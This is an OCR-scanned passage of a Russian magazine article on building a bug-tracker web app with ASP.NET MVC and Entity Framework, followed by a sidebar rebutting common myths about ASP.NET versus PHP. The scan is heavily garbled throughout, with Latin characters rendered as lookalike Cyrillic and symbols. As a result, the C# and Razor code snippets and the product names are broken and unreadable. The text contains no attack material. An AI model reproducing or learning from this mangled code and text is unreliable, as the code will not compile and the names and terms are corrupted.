[.аѵоиі: - "~/Ѵіеи5/5Ьагегі/_Ьи§Т гаскегМаьІіегРаёе. сзИ^шІ"; 

} 



Во время разбора кода мастер-страницы ты наверняка обратил внимание на символ 
«собачка», расположенный возле каждой управляющей конструкции. Все, что идет после 
этого символа, воспринимается как код на языке С#. Если требуется выполнить несколько 
строк управляемого кода, то для этого надо воспользоваться открывающими и закрываю- 
щими скобками. 

Теперь посмотрим на код представления Іпбех. В вьюшке формируется список имею- 
щихся в базе тикетов, Выборка самих данных происходит в контроллере, и список с ними 
передается в представление: 

Ви§ТгаскегСоп*ех'Е сІЬ = пем Ви§ТгаскегСоп1:ех1 : ( ) ; 

ѵаг ігіске'Сз = сИэ.Тіске~Е5.Іпс1исІе( р => р.СаІіееогу) .ІпсІисІеСр => <-■ 

р. Бііаііиз) . Іпс Іисіе ( р => р.ІІБег); 

геііигп Ѵіеы(^іскеТ5 .ТоНз^О ) : 

Запрос к таблицам БД выполняется не напрямую, а через Епііі^ Ргатеѵѵогк. Поскольку 
модель Тіскеі содержит ссылки на другие модели, то мы должны вкл ючить их в запрос (ме- 
тод ІпсІибеО). Сформированная выборка передается в качестве параметра соответствую- 
щему представлению. 

Выводданных из модели в самом представлении осуществляется в стандартном цикле: 

(ЙТогеасЬ {ѵаг с іп Мосіеі) 

Здесь я перебираю записи из Мосіеі, которую предварительно объявили в самом начале 
файла представления: 

(Этосіеі ІЕпитегаЫе<ВиеТгаскегРогХ.МосІеІ 5 Л іске~Е>. 

На этом код первого іпбех() можно считать разобранным, самое время осуществить тесто- 
вый запуск проекта и посмотреть результат. 

Полный список тикетов выводится, и теперь остается лишь дописать код добавления 
новых записей — это будет твоим домашним заданием. 
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ОБ АЗРМТ / А8РМТ МѴС 

«А под ІІИ/Х-Ике это 
не заведется!» 

Еще как заведется. Достаточно 
немного почитать о проекте Мопо 
( аоо.аІ/РЗЗѵ ). а потом статью 
«Установка АЗРЫЕТ на Ыпих 
(пдіпх + топо + Х5Р)» ( юо.яі 
), и миф сразу развеется. 

«Это же жутко дорого , надо много 
$$$», 

Опять неправда. Можно восполь- 
зоваться ехргезз-версией ѴізиаІ 
Зіибіо ІогѴѴеЬ (именно ее я ис- 
пользовал при написании статьи) 
или какой-нибудь альтернативной 
средой (все верно, здесь сплош- 
ная демократия). Остальные ком- 
поненты (например, ЗОБЗегѵег) 
также доступны в бесплатных 
вариантах. Кроме того, Мі егозой 
регулярно проводит всяческие 
акции/скидки, позволяющие по- 
лучить полноценные версии про- 
дуктов либо совсем бесплатно, 
либо с существенной скидкой. 

« МісгозоИ делает дырявый софт». 

Ну да, и это не мешает им 
богатеть и завоевывать новые 
рынки. Если серьезно, про- 
дукты МісгозоЙ в большинстве 
случаев намного безопаснее, 
чем опенсорсные альтернативы. 
Проверить это нетрудно. За- 
ходим на багтрекер и смотрим 
количество ошибок под ИЗ (как 
пример) и подАрасІіе. Результа- 
ты приятно удивят. 

«РНР- приложения работают 

быстрее». 

Точно, работают. Не забывай, 
что код под АЗРІЧЕТ будет снача- 
ла компилироваться, а только по- 
том исполняться. Причем именно 
выполняться, а не стремиться 
умереть, как аналогичный на РНР. 
Поэтому РНР если немного 
и побеждает, то только на фаль- 
старте. Производительность АЗР, 
ИЕТ хорошо показывает себя 
на больших проектах. 
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Разрабатывать веб-приложения под платформу АЗР.ЫЕТ благодаря фреймворку АЗР ЫЕТ 
стало значительно проще. Рассмотренный в статье пример — лишнее тому подтверждение. 
Я не хочу сказать, что АЗР.ЫЕТ — это золотой костыль или серебряная пуля веб-строителя. 
Это очередная технология, которую нужно уметь применять. Мир на РНР, пусть даже с его 
многообразием самых разных фреймворков, однозначно не заканчивается. Не стесняйся 
пробовать альтернативные технологии, не засиживайся в одной, пусть даже самой ком- 
фортной среде. Сравнивай технологии и выбирай из них наиболее оптимальную для кон- 
кретной задачи. 

На этом у меня все. □□ 
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«На РНР программировать 
проще». 

Порог вхождения действи- 
тельно ниже, но не настолько, 
как об этом твердят на каждом 
шагу. Время, вложенное в из- 
учение полностью объектно- 
ориентированного С#, окупится 
на первом же более сложном 
проекте. 









